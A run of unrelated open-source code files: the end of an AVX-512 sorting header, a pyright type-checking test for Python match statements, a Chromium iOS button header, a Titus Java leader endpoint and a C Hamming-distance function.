_mm512_loadu_si512((__m512i const *) ptr + 3);; __m512i d05 = _mm512_loadu_si512((__m512i const *) ptr + 4);; __m512i d06 = _mm512_loadu_si512((__m512i const *) ptr + 5);; __m512i d07 = _mm512_loadu_si512((__m512i const *) ptr + 6);; __m512i d08 = _mm512_loadu_si512((__m512i const *) ptr + 7);; __m512i d09 = _mm512_mask_loadu_epi32(_mm512_set1_epi32(MAX), mask, (int32_t const *) ((__m512i const *) ptr + 8)); sort_09v_ascending(d01, d02, d03, d04, d05, d06, d07, d08, d09); _mm512_storeu_si512((__m512i *) ptr + 0, d01); _mm512_storeu_si512((__m512i *) ptr + 1, d02); _mm512_storeu_si512((__m512i *) ptr + 2, d03); _mm512_storeu_si512((__m512i *) ptr + 3, d04); _mm512_storeu_si512((__m512i *) ptr + 4, d05); _mm512_storeu_si512((__m512i *) ptr + 5, d06); _mm512_storeu_si512((__m512i *) ptr + 6, d07); _mm512_storeu_si512((__m512i *) ptr + 7, d08); _mm512_mask_storeu_epi32((__m512i *) ptr + 8, mask, d09); } static NOINLINE void sort_10v_alt(int32_t *ptr, int remainder) { const auto mask = 0xFFFF >> ((N - remainder) & (N-1)); __m512i d01 = _mm512_loadu_si512((__m512i const *) ptr + 0);; __m512i d02 = _mm512_loadu_si512((__m512i const *) ptr + 1);; __m512i d03 = _mm512_loadu_si512((__m512i const *) ptr + 2);; __m512i d04 = _mm512_loadu_si512((__m512i const *) ptr + 3);; __m512i d05 = _mm512_loadu_si512((__m512i const *) ptr + 4);; __m512i d06 = _mm512_loadu_si512((__m512i const *) ptr + 5);; __m512i d07 = _mm512_loadu_si512((__m512i const *) ptr + 6);; __m512i d08 = _mm512_loadu_si512((__m512i const *) ptr + 7);; __m512i d09 = _mm512_loadu_si512((__m512i const *) ptr + 8);; __m512i d10 = _mm512_mask_loadu_epi32(_mm512_set1_epi32(MAX), mask, (int32_t const *) ((__m512i const *) ptr + 9)); sort_10v_ascending(d01, d02, d03, d04, d05, d06, d07, d08, d09, d10); _mm512_storeu_si512((__m512i *) ptr + 0, d01); _mm512_storeu_si512((__m512i *) ptr + 1, d02); _mm512_storeu_si512((__m512i *) ptr + 2, d03); _mm512_storeu_si512((__m512i *) ptr + 3, d04); _mm512_storeu_si512((__m512i *) ptr + 4, d05); _mm512_storeu_si512((__m512i *) ptr + 5, d06); _mm512_storeu_si512((__m512i *) ptr + 6, d07); _mm512_storeu_si512((__m512i *) ptr + 7, d08); _mm512_storeu_si512((__m512i *) ptr + 8, d09); _mm512_mask_storeu_epi32((__m512i *) ptr + 9, mask, d10); } static NOINLINE void sort_11v_alt(int32_t *ptr, int remainder) { const auto mask = 0xFFFF >> ((N - remainder) & (N-1)); __m512i d01 = _mm512_loadu_si512((__m512i const *) ptr + 0);; __m512i d02 = _mm512_loadu_si512((__m512i const *) ptr + 1);; __m512i d03 = _mm512_loadu_si512((__m512i const *) ptr + 2);; __m512i d04 = _mm512_loadu_si512((__m512i const *) ptr + 3);; __m512i d05 = _mm512_loadu_si512((__m512i const *) ptr + 4);; __m512i d06 = _mm512_loadu_si512((__m512i const *) ptr + 5);; __m512i d07 = _mm512_loadu_si512((__m512i const *) ptr + 6);; __m512i d08 = _mm512_loadu_si512((__m512i const *) ptr + 7);; __m512i d09 = _mm512_loadu_si512((__m512i const *) ptr + 8);; __m512i d10 = _mm512_loadu_si512((__m512i const *) ptr + 9);; __m512i d11 = _mm512_mask_loadu_epi32(_mm512_set1_epi32(MAX), mask, (int32_t const *) ((__m512i const *) ptr + 10)); sort_11v_ascending(d01, d02, d03, d04, d05, d06, d07, d08, d09, d10, d11); _mm512_storeu_si512((__m512i *) ptr + 0, d01); _mm512_storeu_si512((__m512i *) ptr + 1, d02); _mm512_storeu_si512((__m512i *) ptr + 2, d03); _mm512_storeu_si512((__m512i *) ptr + 3, d04); _mm512_storeu_si512((__m512i *) ptr + 4, d05); _mm512_storeu_si512((__m512i *) ptr + 5, d06); _mm512_storeu_si512((__m512i *) ptr + 6, d07); _mm512_storeu_si512((__m512i *) 
ptr + 7, d08); _mm512_storeu_si512((__m512i *) ptr + 8, d09); _mm512_storeu_si512((__m512i *) ptr + 9, d10); _mm512_mask_storeu_epi32((__m512i *) ptr + 10, mask, d11); } static NOINLINE void sort_12v_alt(int32_t *ptr, int remainder) { const auto mask = 0xFFFF >> ((N - remainder) & (N-1)); __m512i d01 = _mm512_loadu_si512((__m512i const *) ptr + 0);; __m512i d02 = _mm512_loadu_si512((__m512i const *) ptr + 1);; __m512i d03 = _mm512_loadu_si512((__m512i const *) ptr + 2);; __m512i d04 = _mm512_loadu_si512((__m512i const *) ptr + 3);; __m512i d05 = _mm512_loadu_si512((__m512i const *) ptr + 4);; __m512i d06 = _mm512_loadu_si512((__m512i const *) ptr + 5);; __m512i d07 = _mm512_loadu_si512((__m512i const *) ptr + 6);; __m512i d08 = _mm512_loadu_si512((__m512i const *) ptr + 7);; __m512i d09 = _mm512_loadu_si512((__m512i const *) ptr + 8);; __m512i d10 = _mm512_loadu_si512((__m512i const *) ptr + 9);; __m512i d11 = _mm512_loadu_si512((__m512i const *) ptr + 10);; __m512i d12 = _mm512_mask_loadu_epi32(_mm512_set1_epi32(MAX), mask, (int32_t const *) ((__m512i const *) ptr + 11)); sort_12v_ascending(d01, d02, d03, d04, d05, d06, d07, d08, d09, d10, d11, d12); _mm512_storeu_si512((__m512i *) ptr + 0, d01); _mm512_storeu_si512((__m512i *) ptr + 1, d02); _mm512_storeu_si512((__m512i *) ptr + 2, d03); _mm512_storeu_si512((__m512i *) ptr + 3, d04); _mm512_storeu_si512((__m512i *) ptr + 4, d05); _mm512_storeu_si512((__m512i *) ptr + 5, d06); _mm512_storeu_si512((__m512i *) ptr + 6, d07); _mm512_storeu_si512((__m512i *) ptr + 7, d08); _mm512_storeu_si512((__m512i *) ptr + 8, d09); _mm512_storeu_si512((__m512i *) ptr + 9, d10); _mm512_storeu_si512((__m512i *) ptr + 10, d11); _mm512_mask_storeu_epi32((__m512i *) ptr + 11, mask, d12); } static NOINLINE void sort_13v_alt(int32_t *ptr, int remainder) { const auto mask = 0xFFFF >> ((N - remainder) & (N-1)); __m512i d01 = _mm512_loadu_si512((__m512i const *) ptr + 0);; __m512i d02 = _mm512_loadu_si512((__m512i const *) ptr + 1);; __m512i d03 = _mm512_loadu_si512((__m512i const *) ptr + 2);; __m512i d04 = _mm512_loadu_si512((__m512i const *) ptr + 3);; __m512i d05 = _mm512_loadu_si512((__m512i const *) ptr + 4);; __m512i d06 = _mm512_loadu_si512((__m512i const *) ptr + 5);; __m512i d07 = _mm512_loadu_si512((__m512i const *) ptr + 6);; __m512i d08 = _mm512_loadu_si512((__m512i const *) ptr + 7);; __m512i d09 = _mm512_loadu_si512((__m512i const *) ptr + 8);; __m512i d10 = _mm512_loadu_si512((__m512i const *) ptr + 9);; __m512i d11 = _mm512_loadu_si512((__m512i const *) ptr + 10);; __m512i d12 = _mm512_loadu_si512((__m512i const *) ptr + 11);; __m512i d13 = _mm512_mask_loadu_epi32(_mm512_set1_epi32(MAX), mask, (int32_t const *) ((__m512i const *) ptr + 12)); sort_13v_ascending(d01, d02, d03, d04, d05, d06, d07, d08, d09, d10, d11, d12, d13); _mm512_storeu_si512((__m512i *) ptr + 0, d01); _mm512_storeu_si512((__m512i *) ptr + 1, d02); _mm512_storeu_si512((__m512i *) ptr + 2, d03); _mm512_storeu_si512((__m512i *) ptr + 3, d04); _mm512_storeu_si512((__m512i *) ptr + 4, d05); _mm512_storeu_si512((__m512i *) ptr + 5, d06); _mm512_storeu_si512((__m512i *) ptr + 6, d07); _mm512_storeu_si512((__m512i *) ptr + 7, d08); _mm512_storeu_si512((__m512i *) ptr + 8, d09); _mm512_storeu_si512((__m512i *) ptr + 9, d10); _mm512_storeu_si512((__m512i *) ptr + 10, d11); _mm512_storeu_si512((__m512i *) ptr + 11, d12); _mm512_mask_storeu_epi32((__m512i *) ptr + 12, mask, d13); } static NOINLINE void sort_14v_alt(int32_t *ptr, int remainder) { const auto mask = 0xFFFF >> ((N - remainder) 
& (N-1)); __m512i d01 = _mm512_loadu_si512((__m512i const *) ptr + 0);; __m512i d02 = _mm512_loadu_si512((__m512i const *) ptr + 1);; __m512i d03 = _mm512_loadu_si512((__m512i const *) ptr + 2);; __m512i d04 = _mm512_loadu_si512((__m512i const *) ptr + 3);; __m512i d05 = _mm512_loadu_si512((__m512i const *) ptr + 4);; __m512i d06 = _mm512_loadu_si512((__m512i const *) ptr + 5);; __m512i d07 = _mm512_loadu_si512((__m512i const *) ptr + 6);; __m512i d08 = _mm512_loadu_si512((__m512i const *) ptr + 7);; __m512i d09 = _mm512_loadu_si512((__m512i const *) ptr + 8);; __m512i d10 = _mm512_loadu_si512((__m512i const *) ptr + 9);; __m512i d11 = _mm512_loadu_si512((__m512i const *) ptr + 10);; __m512i d12 = _mm512_loadu_si512((__m512i const *) ptr + 11);; __m512i d13 = _mm512_loadu_si512((__m512i const *) ptr + 12);; __m512i d14 = _mm512_mask_loadu_epi32(_mm512_set1_epi32(MAX), mask, (int32_t const *) ((__m512i const *) ptr + 13)); sort_14v_ascending(d01, d02, d03, d04, d05, d06, d07, d08, d09, d10, d11, d12, d13, d14); _mm512_storeu_si512((__m512i *) ptr + 0, d01); _mm512_storeu_si512((__m512i *) ptr + 1, d02); _mm512_storeu_si512((__m512i *) ptr + 2, d03); _mm512_storeu_si512((__m512i *) ptr + 3, d04); _mm512_storeu_si512((__m512i *) ptr + 4, d05); _mm512_storeu_si512((__m512i *) ptr + 5, d06); _mm512_storeu_si512((__m512i *) ptr + 6, d07); _mm512_storeu_si512((__m512i *) ptr + 7, d08); _mm512_storeu_si512((__m512i *) ptr + 8, d09); _mm512_storeu_si512((__m512i *) ptr + 9, d10); _mm512_storeu_si512((__m512i *) ptr + 10, d11); _mm512_storeu_si512((__m512i *) ptr + 11, d12); _mm512_storeu_si512((__m512i *) ptr + 12, d13); _mm512_mask_storeu_epi32((__m512i *) ptr + 13, mask, d14); } static NOINLINE void sort_15v_alt(int32_t *ptr, int remainder) { const auto mask = 0xFFFF >> ((N - remainder) & (N-1)); __m512i d01 = _mm512_loadu_si512((__m512i const *) ptr + 0);; __m512i d02 = _mm512_loadu_si512((__m512i const *) ptr + 1);; __m512i d03 = _mm512_loadu_si512((__m512i const *) ptr + 2);; __m512i d04 = _mm512_loadu_si512((__m512i const *) ptr + 3);; __m512i d05 = _mm512_loadu_si512((__m512i const *) ptr + 4);; __m512i d06 = _mm512_loadu_si512((__m512i const *) ptr + 5);; __m512i d07 = _mm512_loadu_si512((__m512i const *) ptr + 6);; __m512i d08 = _mm512_loadu_si512((__m512i const *) ptr + 7);; __m512i d09 = _mm512_loadu_si512((__m512i const *) ptr + 8);; __m512i d10 = _mm512_loadu_si512((__m512i const *) ptr + 9);; __m512i d11 = _mm512_loadu_si512((__m512i const *) ptr + 10);; __m512i d12 = _mm512_loadu_si512((__m512i const *) ptr + 11);; __m512i d13 = _mm512_loadu_si512((__m512i const *) ptr + 12);; __m512i d14 = _mm512_loadu_si512((__m512i const *) ptr + 13);; __m512i d15 = _mm512_mask_loadu_epi32(_mm512_set1_epi32(MAX), mask, (int32_t const *) ((__m512i const *) ptr + 14)); sort_15v_ascending(d01, d02, d03, d04, d05, d06, d07, d08, d09, d10, d11, d12, d13, d14, d15); _mm512_storeu_si512((__m512i *) ptr + 0, d01); _mm512_storeu_si512((__m512i *) ptr + 1, d02); _mm512_storeu_si512((__m512i *) ptr + 2, d03); _mm512_storeu_si512((__m512i *) ptr + 3, d04); _mm512_storeu_si512((__m512i *) ptr + 4, d05); _mm512_storeu_si512((__m512i *) ptr + 5, d06); _mm512_storeu_si512((__m512i *) ptr + 6, d07); _mm512_storeu_si512((__m512i *) ptr + 7, d08); _mm512_storeu_si512((__m512i *) ptr + 8, d09); _mm512_storeu_si512((__m512i *) ptr + 9, d10); _mm512_storeu_si512((__m512i *) ptr + 10, d11); _mm512_storeu_si512((__m512i *) ptr + 11, d12); _mm512_storeu_si512((__m512i *) ptr + 12, d13); _mm512_storeu_si512((__m512i *) ptr 
+ 13, d14); _mm512_mask_storeu_epi32((__m512i *) ptr + 14, mask, d15); } static NOINLINE void sort_16v_alt(int32_t *ptr, int remainder) { const auto mask = 0xFFFF >> ((N - remainder) & (N-1)); __m512i d01 = _mm512_loadu_si512((__m512i const *) ptr + 0);; __m512i d02 = _mm512_loadu_si512((__m512i const *) ptr + 1);; __m512i d03 = _mm512_loadu_si512((__m512i const *) ptr + 2);; __m512i d04 = _mm512_loadu_si512((__m512i const *) ptr + 3);; __m512i d05 = _mm512_loadu_si512((__m512i const *) ptr + 4);; __m512i d06 = _mm512_loadu_si512((__m512i const *) ptr + 5);; __m512i d07 = _mm512_loadu_si512((__m512i const *) ptr + 6);; __m512i d08 = _mm512_loadu_si512((__m512i const *) ptr + 7);; __m512i d09 = _mm512_loadu_si512((__m512i const *) ptr + 8);; __m512i d10 = _mm512_loadu_si512((__m512i const *) ptr + 9);; __m512i d11 = _mm512_loadu_si512((__m512i const *) ptr + 10);; __m512i d12 = _mm512_loadu_si512((__m512i const *) ptr + 11);; __m512i d13 = _mm512_loadu_si512((__m512i const *) ptr + 12);; __m512i d14 = _mm512_loadu_si512((__m512i const *) ptr + 13);; __m512i d15 = _mm512_loadu_si512((__m512i const *) ptr + 14);; __m512i d16 = _mm512_mask_loadu_epi32(_mm512_set1_epi32(MAX), mask, (int32_t const *) ((__m512i const *) ptr + 15)); sort_16v_ascending(d01, d02, d03, d04, d05, d06, d07, d08, d09, d10, d11, d12, d13, d14, d15, d16); _mm512_storeu_si512((__m512i *) ptr + 0, d01); _mm512_storeu_si512((__m512i *) ptr + 1, d02); _mm512_storeu_si512((__m512i *) ptr + 2, d03); _mm512_storeu_si512((__m512i *) ptr + 3, d04); _mm512_storeu_si512((__m512i *) ptr + 4, d05); _mm512_storeu_si512((__m512i *) ptr + 5, d06); _mm512_storeu_si512((__m512i *) ptr + 6, d07); _mm512_storeu_si512((__m512i *) ptr + 7, d08); _mm512_storeu_si512((__m512i *) ptr + 8, d09); _mm512_storeu_si512((__m512i *) ptr + 9, d10); _mm512_storeu_si512((__m512i *) ptr + 10, d11); _mm512_storeu_si512((__m512i *) ptr + 11, d12); _mm512_storeu_si512((__m512i *) ptr + 12, d13); _mm512_storeu_si512((__m512i *) ptr + 13, d14); _mm512_storeu_si512((__m512i *) ptr + 14, d15); _mm512_mask_storeu_epi32((__m512i *) ptr + 15, mask, d16); } static void sort(int32_t *ptr, size_t length); }; } } #undef i2d #undef d2i #undef i2s #undef s2i #undef s2d #undef d2s #ifdef __GNUC__ #ifdef __clang__ #pragma clang attribute pop #else #pragma GCC pop_options #endif #endif #endif
33,329
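The sort_XXv_alt loaders in the vxsort header above handle a partial final vector with a masked load: lanes past `remainder` are filled with the int32 maximum so they sort to the end, and the same mask keeps the masked store from writing them back. Below is a small standalone check — not part of the generated header — of the mask arithmetic 0xFFFF >> ((N - remainder) & (N - 1)) with N = 16 lanes, confirming that for remainder in 1..16 exactly `remainder` low bits survive (16 meaning a full vector).

// Standalone sketch verifying the tail-mask expression; no AVX-512 needed.
#include <cassert>
#include <cstdint>

int main() {
  const int N = 16;  // 16 int32 lanes per __m512i
  for (int remainder = 1; remainder <= N; ++remainder) {
    const uint16_t mask = 0xFFFF >> ((N - remainder) & (N - 1));
    // Count the set bits: these are the lanes that get loaded and stored.
    int lanes = 0;
    for (uint16_t m = mask; m != 0; m >>= 1) {
      lanes += m & 1;
    }
    assert(lanes == remainder);
  }
  return 0;
}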
3,934
<filename>packages/pyright-internal/src/tests/samples/match2.py # This sample tests type checking for match statements (as # described in PEP 634) that contain sequence patterns. from typing import Any, Generic, List, Literal, Protocol, Tuple, TypeVar, Union def test_unknown(value_to_match): match value_to_match: case a1, a2: reveal_type(a1, expected_text="Unknown") reveal_type(a2, expected_text="Unknown") case *b1, b2: reveal_type(b1, expected_text="list[Unknown]") reveal_type(b2, expected_text="Unknown") case c1, *c2: reveal_type(c1, expected_text="Unknown") reveal_type(c2, expected_text="list[Unknown]") case d1, *d2, d3: reveal_type(d1, expected_text="Unknown") reveal_type(d2, expected_text="list[Unknown]") reveal_type(d3, expected_text="Unknown") case 3, *e1: reveal_type(e1, expected_text="list[Unknown]") case "hi", *f1: reveal_type(f1, expected_text="list[Unknown]") case *g1, "hi": reveal_type(g1, expected_text="list[Unknown]") def test_list(value_to_match: List[str]): match value_to_match: case a1, a2: reveal_type(a1, expected_text="str") reveal_type(a2, expected_text="str") reveal_type(value_to_match, expected_text="List[str]") case *b1, b2: reveal_type(b1, expected_text="list[str]") reveal_type(b2, expected_text="str") reveal_type(value_to_match, expected_text="List[str]") case c1, *c2: reveal_type(c1, expected_text="str") reveal_type(c2, expected_text="list[str]") reveal_type(value_to_match, expected_text="List[str]") case d1, *d2, d3: reveal_type(d1, expected_text="str") reveal_type(d2, expected_text="list[str]") reveal_type(d3, expected_text="str") reveal_type(value_to_match, expected_text="List[str]") case 3, *e1: reveal_type(e1, expected_text="Never") reveal_type(value_to_match, expected_text="Never") case "hi", *f1: reveal_type(f1, expected_text="list[str]") reveal_type(value_to_match, expected_text="List[str]") case *g1, "hi": reveal_type(g1, expected_text="list[str]") reveal_type(value_to_match, expected_text="List[str]") def test_open_ended_tuple(value_to_match: Tuple[str, ...]): match value_to_match: case a1, a2: reveal_type(a1, expected_text="str") reveal_type(a2, expected_text="str") reveal_type(value_to_match, expected_text="tuple[str, str]") case *b1, b2: reveal_type(b1, expected_text="list[str]") reveal_type(b2, expected_text="str") reveal_type(value_to_match, expected_text="Tuple[str, ...]") case c1, *c2: reveal_type(c1, expected_text="str") reveal_type(c2, expected_text="list[str]") reveal_type(value_to_match, expected_text="Tuple[str, ...]") case d1, *d2, d3: reveal_type(d1, expected_text="str") reveal_type(d2, expected_text="list[str]") reveal_type(d3, expected_text="str") reveal_type(value_to_match, expected_text="Tuple[str, ...]") case 3, *e1: reveal_type(e1, expected_text="Never") reveal_type(value_to_match, expected_text="Never") case "hi", *f1: reveal_type(f1, expected_text="list[str]") reveal_type(value_to_match, expected_text="Tuple[str, ...]") case *g1, "hi": reveal_type(g1, expected_text="list[str]") reveal_type(value_to_match, expected_text="Tuple[str, ...]") def test_definite_tuple(value_to_match: Tuple[int, str, float, complex]): match value_to_match: case a1, a2, a3, a4 if value_to_match[0] == 0: reveal_type(a1, expected_text="int") reveal_type(a2, expected_text="str") reveal_type(a3, expected_text="float") reveal_type(a4, expected_text="complex") reveal_type(value_to_match, expected_text="tuple[int, str, float, complex]") case *b1, b2 if value_to_match[0] == 0: reveal_type(b1, expected_text="list[int | str | float]") reveal_type(b2, 
expected_text="complex") reveal_type(value_to_match, expected_text="Tuple[int, str, float, complex]") case c1, *c2 if value_to_match[0] == 0: reveal_type(c1, expected_text="int") reveal_type(c2, expected_text="list[str | float | complex]") reveal_type(value_to_match, expected_text="Tuple[int, str, float, complex]") case d1, *d2, d3 if value_to_match[0] == 0: reveal_type(d1, expected_text="int") reveal_type(d2, expected_text="list[str | float]") reveal_type(d3, expected_text="complex") reveal_type(value_to_match, expected_text="Tuple[int, str, float, complex]") case 3, *e1: reveal_type(e1, expected_text="list[str | float | complex]") reveal_type(value_to_match, expected_text="Tuple[int, str, float, complex]") case "hi", *f1: reveal_type(f1, expected_text="Never") reveal_type(value_to_match, expected_text="Never") case *g1, 3j: reveal_type(g1, expected_text="list[int | str | float]") reveal_type(value_to_match, expected_text="Tuple[int, str, float, complex]") case *h1, "hi": reveal_type(h1, expected_text="Never") reveal_type(value_to_match, expected_text="Never") def test_union(value_to_match: Union[Tuple[complex, complex], Tuple[int, str, float, complex], List[str], Tuple[float, ...], Any]): match value_to_match: case a1, a2, a3, a4 if value_to_match[0] == 0: reveal_type(a1, expected_text="int | str | float | Any") reveal_type(a2, expected_text="str | float | Any") reveal_type(a3, expected_text="float | str | Any") reveal_type(a4, expected_text="complex | str | float | Any") reveal_type(value_to_match, expected_text="tuple[int, str, float, complex] | List[str] | tuple[float, float, float, float] | Any") case *b1, b2 if value_to_match[0] == 0: reveal_type(b1, expected_text="list[complex] | list[int | str | float] | list[str] | list[float] | list[Any]") reveal_type(b2, expected_text="complex | str | float | Any") reveal_type(value_to_match, expected_text="Tuple[complex, complex] | Tuple[int, str, float, complex] | List[str] | Tuple[float, ...] | Any") case c1, *c2 if value_to_match[0] == 0: reveal_type(c1, expected_text="complex | int | str | float | Any") reveal_type(c2, expected_text="list[complex] | list[str | float | complex] | list[str] | list[float] | list[Any]") reveal_type(value_to_match, expected_text="Tuple[complex, complex] | Tuple[int, str, float, complex] | List[str] | Tuple[float, ...] | Any") case d1, *d2, d3 if value_to_match[0] == 0: reveal_type(d1, expected_text="complex | int | str | float | Any") reveal_type(d2, expected_text="list[str | float] | list[str] | list[float] | list[Any]") reveal_type(d3, expected_text="complex | str | float | Any") reveal_type(value_to_match, expected_text="Tuple[complex, complex] | Tuple[int, str, float, complex] | List[str] | Tuple[float, ...] | Any") case 3, e1: reveal_type(e1, expected_text="complex | float | Any") reveal_type(value_to_match, expected_text="tuple[Literal[3], complex] | tuple[Literal[3], float] | Any") case "hi", *f1: reveal_type(f1, expected_text="list[str] | list[Any]") reveal_type(value_to_match, expected_text="List[str] | Any") case *g1, 3j: reveal_type(g1, expected_text="list[complex] | list[int | str | float] | list[Any]") reveal_type(value_to_match, expected_text="Tuple[complex, complex] | Tuple[int, str, float, complex] | Any") case *h1, "hi": reveal_type(h1, expected_text="list[str] | list[Any]") reveal_type(value_to_match, expected_text="List[str] | Any") class SupportsLessThan(Protocol): def __lt__(self, __other: Any) -> bool: ... def __le__(self, __other: Any) -> bool: ... 
SupportsLessThanT = TypeVar("SupportsLessThanT", bound=SupportsLessThan) def sort(seq: List[SupportsLessThanT]) -> List[SupportsLessThanT]: match seq: case [] | [_]: reveal_type(seq, expected_text="List[SupportsLessThanT@sort]") return seq case [x, y] if x <= y: reveal_type(seq, expected_text="List[SupportsLessThanT@sort]") return seq case [x, y]: reveal_type(seq, expected_text="List[SupportsLessThanT@sort]") return [y, x] case [x, y, z] if x <= y <= z: reveal_type(seq, expected_text="List[SupportsLessThanT@sort]") return seq case [x, y, z] if x > y > z: reveal_type(seq, expected_text="List[SupportsLessThanT@sort]") return [z, y, x] case [p, *rest]: a = sort([x for x in rest if x <= p]) b = sort([x for x in rest if p < x]) reveal_type(seq, expected_text="List[SupportsLessThanT@sort]") return a + [p] + b return seq def test_exceptions(seq: Union[str, bytes, bytearray]): match seq: case [x, y]: reveal_type(x, expected_text="Never") reveal_type(y, expected_text="Never") return seq def test_object(seq: object): match seq: case (a1, a2) as a3: reveal_type(a1, expected_text="object") reveal_type(a2, expected_text="object") reveal_type(a3, expected_text="Sequence[object]") reveal_type(seq, expected_text="Sequence[object]") case (*b1, b2) as b3: reveal_type(b1, expected_text="list[object]") reveal_type(b2, expected_text="object") reveal_type(b3, expected_text="Sequence[object]") reveal_type(seq, expected_text="Sequence[object]") case (c1, *c2) as c3: reveal_type(c1, expected_text="object") reveal_type(c2, expected_text="list[object]") reveal_type(c3, expected_text="Sequence[object]") reveal_type(seq, expected_text="Sequence[object]") case (d1, *d2, d3) as d4: reveal_type(d1, expected_text="object") reveal_type(d2, expected_text="list[object]") reveal_type(d3, expected_text="object") reveal_type(d4, expected_text="Sequence[object]") reveal_type(seq, expected_text="Sequence[object]") case (3, *e1) as e2: reveal_type(e1, expected_text="list[object]") reveal_type(e2, expected_text="Sequence[object | int]") reveal_type(seq, expected_text="Sequence[object | int]") case ("hi", *f1) as f2: reveal_type(f1, expected_text="list[object]") reveal_type(f2, expected_text="Sequence[object | str]") reveal_type(seq, expected_text="Sequence[object | str]") case (*g1, "hi") as g2: reveal_type(g1, expected_text="list[object]") reveal_type(g2, expected_text="Sequence[object | str]") reveal_type(seq, expected_text="Sequence[object | str]") case [1, "hi", True] as h1: reveal_type(h1, expected_text="Sequence[int | str | bool]") reveal_type(seq, expected_text="Sequence[int | str | bool]") case [1, i1] as i2: reveal_type(i1, expected_text="object") reveal_type(i2, expected_text="Sequence[object | int]") reveal_type(seq, expected_text="Sequence[object | int]") _T = TypeVar('_T') class A(Generic[_T]): a: _T class B: ... class C: ... AAlias = A AInt = A[int] BOrC = B | C def test_illegal_type_alias(m: object): match m: case AAlias(a=i): pass # This should generate an error because it raises an # exception at runtime. case AInt(a=i): pass # This should generate an error because it raises an # exception at runtime. 
case BOrC(a=i): pass def test_negative_narrowing1(subj: tuple[Literal[0]] | tuple[Literal[1]]): match subj: case (1,*a) | (*a): reveal_type(subj, expected_text="tuple[Literal[1]] | tuple[Literal[0]]") reveal_type(a, expected_text="list[int]") case b: reveal_type(subj, expected_text="Never") reveal_type(b, expected_text="Never") def test_negative_narrowing2(subj: tuple[int, ...]): match subj: case (1,*a): reveal_type(subj, expected_text="tuple[int, ...]") reveal_type(a, expected_text="list[int]") case (b,): reveal_type(subj, expected_text="tuple[int]") reveal_type(b, expected_text="int") case (*c,): reveal_type(subj, expected_text="tuple[int, ...]") reveal_type(c, expected_text="list[int]") case d: reveal_type(subj, expected_text="Never") reveal_type(d, expected_text="Never")
6,683
777
<gh_stars>100-1000 // Copyright 2015 The Chromium Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be // found in the LICENSE file. #ifndef IOS_CHROME_TODAY_EXTENSION_NOTIFICATION_CENTER_BUTTON_H_ #define IOS_CHROME_TODAY_EXTENSION_NOTIFICATION_CENTER_BUTTON_H_ #import <UIKit/UIKit.h> #import "ios/chrome/today_extension/transparent_button.h" // A button with a separated view background. This is needed as background // objects in notification center must be subviews of a UIVisualEffectView. @interface NotificationCenterButton : TransparentButton // Designated initializer. // Initializes a button with |title|, normal icon with asset named |icon|, // calling [target action] on UIControlEventTouchUpInside // event. |backgroundColor|, |inkColor|, |titleColor| are respectively the // background inactive color, the background pressed color, and the title color. - (instancetype)initWithTitle:(NSString*)title icon:(NSString*)icon target:(id)target action:(SEL)action backgroundColor:(UIColor*)backgroundColor inkColor:(UIColor*)inkColor titleColor:(UIColor*)titleColor; // Sets the different spaces of the button. // |separator| is the distance between the left of the icon and the left of the // text (in LTR), // |frontShift| shifts the center of the button to the front by |frontShift|/2, // (front is left in LTR, right in RTL). // |horizontalPadding| sets the left and right paddings, // |verticalPadding| sets the top and bottom paddings. - (void)setButtonSpacesSeparator:(const CGFloat)separator frontShift:(const CGFloat)frontShift horizontalPadding:(const CGFloat)horizontalPadding verticalPadding:(const CGFloat)verticalPadding; @end #endif // IOS_CHROME_TODAY_EXTENSION_NOTIFICATION_CENTER_BUTTON_H_
717
313
<filename>titus-server-master/src/main/java/com/netflix/titus/master/endpoint/v2/rest/LeaderResource.java /* * Copyright 2018 Netflix, Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package com.netflix.titus.master.endpoint.v2.rest; import javax.inject.Inject; import javax.inject.Singleton; import javax.ws.rs.GET; import javax.ws.rs.Path; import javax.ws.rs.Produces; import javax.ws.rs.core.MediaType; import com.netflix.titus.api.endpoint.v2.rest.representation.LeaderRepresentation; import com.netflix.titus.api.supervisor.service.MasterDescription; import com.netflix.titus.api.supervisor.service.MasterMonitor; /** * */ @Path(LeaderEndpoint.PATH_API_V2_LEADER) @Produces(MediaType.APPLICATION_JSON) @Singleton public class LeaderResource implements LeaderEndpoint { private final MasterMonitor masterMonitor; @Inject public LeaderResource(MasterMonitor masterMonitor) { this.masterMonitor = masterMonitor; } @GET public LeaderRepresentation getLeader() { MasterDescription masterDescription = masterMonitor.getLatestLeader(); LeaderRepresentation.Builder builder = LeaderRepresentation.newBuilder() .withHostname(masterDescription.getHostname()) .withHostIP(masterDescription.getHostIP()) .withApiPort(masterDescription.getApiPort()) .withApiStatusUri(masterDescription.getApiStatusUri()) .withCreateTime(masterDescription.getCreateTime()); return builder.build(); } }
689
627
<filename>src/fuzzy/hamming.c // Copyright (c) 2014 <NAME>, MIT License // https://github.com/Rostepher/libstrcmp #include <assert.h> #include <stddef.h> #include <string.h> #include "common.h" /// Computes and returns the hamming distance between two strings. Both strings /// must have the same length and not be NULL. More information about the /// algorithm can be found here: /// http://en.wikipedia.org/wiki/Hamming_distance /// /// @param str1 first non NULL string /// @param str2 second non NULL string /// /// @returns hamming distance or -1 if str1 and str2 do not have the same /// length or if one or both str1 and str2 are NULL int hamming(const char* str1, const char* str2) { // strings cannot be NULL assert(str1 != NULL); assert(str2 != NULL); size_t str1_len = strlen(str1); size_t str2_len = strlen(str2); // handle cases where strings have different lengths if (str1_len != str2_len) { return -1; } // return 0 if strings are both empty, but not NULL if (str1_len == 0 && str2_len == 0) { return 0; } int dist = 0; while (str1_len > 0 && str2_len > 0) { dist += (NOT_EQ(*str1, *str2)); str1++, str2++; str1_len--, str2_len--; } return dist; }
489
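A minimal usage sketch for the hamming() routine above (illustrative only, not part of the libstrcmp sources). It assumes hamming.c is compiled as C and linked alongside, so the extern "C" declaration below stands in for the project's real header.

#include <cassert>
#include <cstdio>

extern "C" int hamming(const char* str1, const char* str2); // assumed C linkage for hamming.c

int main(void) {
    assert(hamming("karolin", "kathrin") == 3);    // three positions differ
    assert(hamming("1011101", "1001001") == 2);    // two bits differ
    assert(hamming("", "") == 0);                  // both empty, but not NULL
    assert(hamming("abc", "abcd") == -1);          // different lengths -> -1
    std::printf("all hamming() checks passed\n");
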